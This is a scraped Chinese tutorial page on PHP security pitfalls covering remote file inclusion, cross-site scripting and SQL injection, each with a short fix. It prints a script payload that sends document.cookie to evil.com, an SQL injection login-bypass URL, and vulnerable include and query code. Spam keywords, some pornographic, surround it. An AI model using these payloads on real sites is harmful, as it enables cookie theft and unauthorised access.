国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 開發 > PHP > 正文

php中一些安全隱藏代碼總結

2024-05-04 21:48:18
字體:
來源:轉載
供稿:網友

程序代碼的安全是一個程序員對開發的應用方面的多方面的素質體現,下面我來總結一下自己的經驗,有需要了解朋友可參考一下.

百度一下,設定open_basedir后只有指定的目錄和子目錄下的php腳本才會被執行,用php讀取open_basedir以外的目錄或文件會報錯,權限不足一般虛擬主機供應商都是設定為/tmp和/home,這是用戶習慣了,我們要想辦法解決這些問題了,下面總結了一些php安全問題.

1.include的時候要小心,要判斷你本地是否有這個文件,以免造成安全漏洞,比如如下 代碼:

  1. <?php 
  2.     include $module.'.php'
  3. ?> 

這里假設$module是function全局變量,這個腳本讓攻擊者有機會在你的服務器上執行任何的php代碼,比如他在瀏覽器url后面加上?module=http://example.com/my就行了。當php接收到這個url的時候,腳本中的"$module"變量的值將被設置為http://example.com/my,因此當php執行include的時候就很危險了......

解決辦法:關閉php.ini中的register_globals或include的時候判斷一下,代碼如下:

  1. <?php 
  2.     if(file_exists($module.'.php')){ 
  3.         include $module.'.php'
  4.     }//開源代碼Vevb.com 
  5. ?> 

2.跨站運行腳本

簡單的說是攻擊者可以在用戶的瀏覽器端執行一些客戶端的腳本,例如js,然后盜取用戶的cookies或其他重要數據.

比如<script language='javaScript'>document.location=?'http://evil.com/cgi-bin/cookie.cgi?f='+document.cookie</script>

如果你點擊了按鈕,你本地的cookie信息將會被發送的某個人的郵箱,由此可見你想做個盜取用戶信息的網站是多么容易.

3.SQL注入

個人覺得是sql自身的靈活,易用給自己帶來的負面影響,代碼如下:

  1. <?php 
  2.     $query "select login_id from users where user='$user' and pwd='$pw'"
  3.     mysql_query($query); 
  4. ?> 

比如用人寫了:http://example.com/login.php?user=admin'%20OR%20(user='&pwd=')%20R%20user='

你的php代碼可能變成如下:

  1. <?php 
  2.     $query = "select login_id from user where user='admin' or (user = '' and pwd='') or user=''"
  3.     mysql_query($query); 
  4. ?> 

可以用函數進行過濾,過濾掉(') ("),()等等.

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 剑阁县| 开阳县| 山西省| 芦溪县| 绥芬河市| 太仆寺旗| 北票市| 建瓯市| 嘉鱼县| 信丰县| 泰兴市| 象山县| 武威市| 横山县| 潮州市| 绥芬河市| 瑞丽市| 太仆寺旗| 台北市| 资兴市| 米林县| 乳源| 德兴市| 文昌市| 牙克石市| 江孜县| 巴青县| 环江| 阜康市| 红河县| 田阳县| 连云港市| 买车| 南召县| 邮箱| 沙河市| 荃湾区| 高碑店市| 敦煌市| 昌平区| 合山市|